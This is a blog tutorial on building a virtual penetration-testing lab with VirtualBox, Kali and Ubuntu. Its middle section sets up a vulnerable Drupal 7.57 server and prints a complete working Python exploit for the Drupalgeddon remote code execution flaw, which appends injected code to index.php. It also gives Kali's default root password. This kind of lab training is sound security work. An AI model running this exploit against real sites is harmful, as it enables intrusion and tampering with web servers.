As a penetration tester it is important to have a controlled environment in which to hone your skills and test new techniques. Testing on systems you do not own is illegal, even if it is just harmless curiosity. In this article I will show you how to build a virtual penetration testing lab using VirtualBox, Kali Linux, and Ubuntu.
In this lab you can test, and hack away without worrying about the men in black showing up at your door. Plus, in a virtual environment you can carefully monitor each system’s behavior during an attack giving you further insight into how an exploit compromises a system.
In addition, with a virtual network you can clone and snapshot instances with just a few clicks and easily create new pre-configured hosts. This allows you to try many different techniques in a short period of time, and always start from the same base configuration.
Below are the steps we will take to create the virtual penetration testing lab.
- Install VirtualBox
- Set up the Virtual Network
- Create the Kali Host
- Build the Base Ubuntu Image
- Hacking Drupal
- Benefits of a Virtual Penetration Testing Lab
- Something Extra
Install VirtualBox
First, you will want to grab a copy of VirtualBox and run through the installation for your OS. VirtualBox is a fantastic virtualization tool and provides a rich feature set for operating virtual machines.
Our entire virtual penetration testing lab will be hosted in VirtualBox. This keeps the host system nice and tidy. Most PCs these days can easily support 2 or even 3 Linux guest VMs hosting a simple web server for example.
VirtualBox also provides snapshot capabilities allowing VM states to be stored and recalled with the click of a button.
Set up the Virtual Network
Once we’ve got VirtualBox installed we need a network for our machines to live on. To keep the lab isolated we will want the machines to be restricted to a dedicated private network. VirtualBox makes this easy with the NAT Network. With a NAT Network all of our lab machines can easily communicate with one another while also having NATed access to the Internet.
If you haven’t set up a NAT Network before read on below. It is a little different from the other VirtualBox networking options but I will show you how to set up a NAT Network in VirtualBox.
First you will need to create the network itself. This is done under VirtualBox > Preferences. Select the Network tab and then add a new network.
Double-clicking the newly created network allows you to configure the subnet IP range, the name of the network, and DHCP options. For now the defaults are fine but go ahead and rename the network if you wish.
I like the NAT Network option best as it provides each of the VMs with a NATed Internet connection. It also places each of the VMs on the same private network allowing our lab machines to easily communicate with one another. Now let us fill our penetration testing lab with some machines.
Create the Kali Host
Kali Linux is a fantastic distribution loaded with all sorts of penetration testing tools. I like to have a Kali host on my lab network either for launching attacks or fingerprinting hosts.
Kali is a breeze to install with the pre-made VirtualBox image. Follow our in-depth tutorial to Install Kali LInux in Virtual Box on Mac. Check that guide out if you need some extra help, otherwise the basic steps are listed below.
Download the Kali VirtualBox image from the Offensive Security downloads page.
The downloaded file is a VirtualBox appliance file. After the download completes, open VirtualBox and select File > Import Appliance…
The default user for the appliance is root with a default password of toor.
Now let us add some targets to the lab network.
Build the Base Ubuntu Image
Ideally we want the virtual pentesting lab to be as re-useable as possible. I use VirtualBox appliances for this. An appliance packages up your virtual machine as a single file including all the machine settings and the current machine state. This appliance file can be imported as many times as needed to create a new virtual machine.
I use Ubuntu for this base machine. Ubuntu is widely supported, and an easily configured OS.
Lets start by setting up a base Ubuntu virtual machine, and then I will show you how to create an appliance out of it.
Download Ubuntu
Download the Ubuntu ISO. The minimal version is fine, but grab the standard version if you prefer a full graphical desktop.
Create the VM
While the ISO is donwloading create a new virtual machine.
Once the ISO has downloaded, insert it into the virtual machine.
Install Ubuntu
Start the VM and run through the Ubuntu installation process. For a base box most of the defaults are fine and give you a clean minimal Ubuntu installation.
There are plenty of installation tutorials available for Ubunut and VirtualBox so I won’t go into detail here. Google is your friend.
Remember, you’ll only have to step through this installation once!
Tweak the Machine
At this point you could stop and create an appliance. However you may also wish to perform a few more customizations for your base appliance.
For example, you could install your preferred text editor (mine’s vim!), install a default set of base packages, or just customize the shell prompt.
Export the Appliance
Once you have finished tweaking your base box it is time to export the appliance. This is as simple as File > Export Appliance. Tweak any options, and put this file somewhere for later.
Now whenever you need a new host in the lab, you can import this appliance. This will save you considerable time as you won’t have to go through the same initial configuration over and over for each host.
Hacking Drupal
That is pretty much all we need for a basic penetration testing lab. We have a master host for launching and monitoring attacks. We have also created a re-useable base appliance for easily creating test targets.
Now I will run through an example exploit using our new penetration testing lab. I will demonstrate one of the DrupalGeddon vulnerabilities that were discovered in early 2018. You may want to start by reading the analysis of the vulnerability.
For this example we will set up a base web server running a vulnerable Drupal installation.
We will then use a simple Python script on the Kali host and exploit the vulnerability.
Creating the Target Host
If you don’t have any Ubuntu VMs running, grab your appliance and spin up a new VM. Log in to your target virtual machine to begin the setup.
The Drupalgeddon vulnerability came out quite some time ago so we will need to install some repositories first.
# Install php5.6 repository
apt-get install software-properties-common
add-apt-repository ppa:ondrej/php
apt-get update
# Install php5.6 packages
apt-get install php5.6 php5.6-gd php5.6-xml php5.6-mysql php5.6-mbstring
Now we can install the Apache web server and the MySQL database
# Install Apache and MySQL
apt install apache2
apt install mysql-server
# Restart apache2
service apache2 restart
# Restart mysql
service mysql restart
# Secure mysql installation
mysql_secure_installation
Now let’s create the database and user.
# Use mysql command to enter the mysql console
mysql
# Then create the database and user
mysql> CREATE DATABASE databasename CHARACTER SET utf8 COLLATE utf8_general_ci;
mysql> CREATE USER username@localhost IDENTIFIED BY 'password';
mysql> GRANT SELECT, INSERT, UPDATE, DELETE, CREATE, DROP, INDEX, ALTER, CREATE TEMPORARY TABLES ON databasename.* TO 'username'@'localhost' IDENTIFIED BY 'password';
After we have installed the required packages, we can begin to install Drupal.
Simply download and extract the Drupal archive, and then pull up the site in a browser to complete the installation.
cd /var/www/html/
wget https://ftp.drupal.org/files/projects/drupal-7.57.tar.gz
tar -xzvf drupal-7.57.tar.gz
cd /var/www/html/drupal-7.57/
cp sites/default/default.settings.php sites/default/settings.php
cd /var/www/html/
chown -R www-data:www-data drupal-7.57/
If you need the private IP of the server you can use the following command.
# Get the server private IP
ifconfig
Now navigate to the IP of your VM in a browser. You should be greeted by the Drupal installation page.
Once you reach the database configuration page, enter the database user details for the user you created earlier.
After the installer is complete you can check out your fresh new homepage.
If we check the status report, we can see that we are in fact running Drupal 7.57. Now let us have some fun with this!
Exploiting the Target
Now that we have a vulnerable target set up, let us get to work exploiting it.
The following is a simple Python script that will exploit the vulnerability and demonstrate remote code execution. Be sure to check out the vulnerability analysis if you aren’t sure how the script works.
This vulnerability gives us the ability to execute arbitrary code on the target server. We could use this to do some pretty nasty things, but lets just make a tiny modification to index.php.
The ‘shell_code’ variable holds the code that we are injecting into index.php. This is just a simple Javascript alert that will show any time the page is loaded. I’ll leave it up to you to see what else you can do with this vulnerability.
#!/usr/bin/python
import requests
import re
import base64
target='192.168.56.9/drupal-7.57'
shell_code = "echo \"<script>alert('Ouch. Time to patch. ');</script>\";"
encoded_cmd = base64.b64encode(shell_code)
bashcmd = "echo " + encoded_cmd + " | base64 -d >> index.php"
print bashcmd
target_url = '/?q=user/password&name[#post_render][]=passthru&name[#type]=markup&name[#markup]=' + bashcmd
payload = "form_id=user_pass&_triggering_element_name=name"
url = 'http://' + target + target_url
url = url.replace('#', '%23')
url = url.replace(' ', '+')
print url
headers = {'content-type': 'application/x-www-form-urlencoded'}
r = requests.post(url, headers=headers, data=payload)
body = r.text
# Extract form id from body
m = re.search('form_build_id" value="(form-.*)"', body)
form_build_id = m.group(1)
trigger_url = 'http://' + target + '/?q=file/ajax/name/#value/' + form_build_id
trigger_url = trigger_url.replace('#', '%23')
trigger_url = trigger_url.replace(' ', '+')
payload = "form_build_id=" + form_build_id
# Trigger the exploit
r = requests.post(trigger_url, headers=headers, data=payload)
Run the script and head on over to your browser. You should see the Javascript alert pop up when the page reloads.
And there you have it. We’ve just exploited Drupal in our virtual penetration testing lab.
Benefits of a Virtual Penetration Testing Lab
We’ve already covered how easy it is to create and snapshot hosts. We can also use Wireshark to monitor network traffic on our lab network.
To do this, open Wireshark on your host machine (the one running VirtualBox). After that, select the NAT Network you created (mine is named vboxnet0) from the available interfaces list.
Wireshark now shows you all the traffic passing between your lab machines. This is extremely useful when debugging an exploit, or assessing a vulnerability.
Something Extra
The best part of a virtual penetration testing lab is the versatility it provides.
Metasploitable2 is a vulnerable virtual machine that can easily be added to your lab.
I go through the installation process in my article: How to Install Metasploitable in VirtualBox
Or you can grab the download on Sourceforge.
Great article K! Keep these coming. I have used VirtualBox for a number of years with success. Question: Do you use the machine as a dedicated virtual server for test VM’s or test the virtual machines from the host? This may not be the place to put this, but I would like to see an article from you that outlines the top 5 or 10 tools that every InfoSec professional should know and why. I would also like to see a post about how to get started in the InfoSec community and what you need to know to be relevant in the field. And finally, I would like you do an article that outlines a successful Pentest attack in a lab environment speaking specifically as to why you did it and what it accomplished. As you can tell, I am a noob and respect the knowledge that you have attained over the years. It is hard to start out because very few people believe in the concept of security by offense. Schools don’t teach it and it makes for an unprepared and irrelevant security professional that can spit out theory as if it was application. Thanks again K! I look forward to your next post!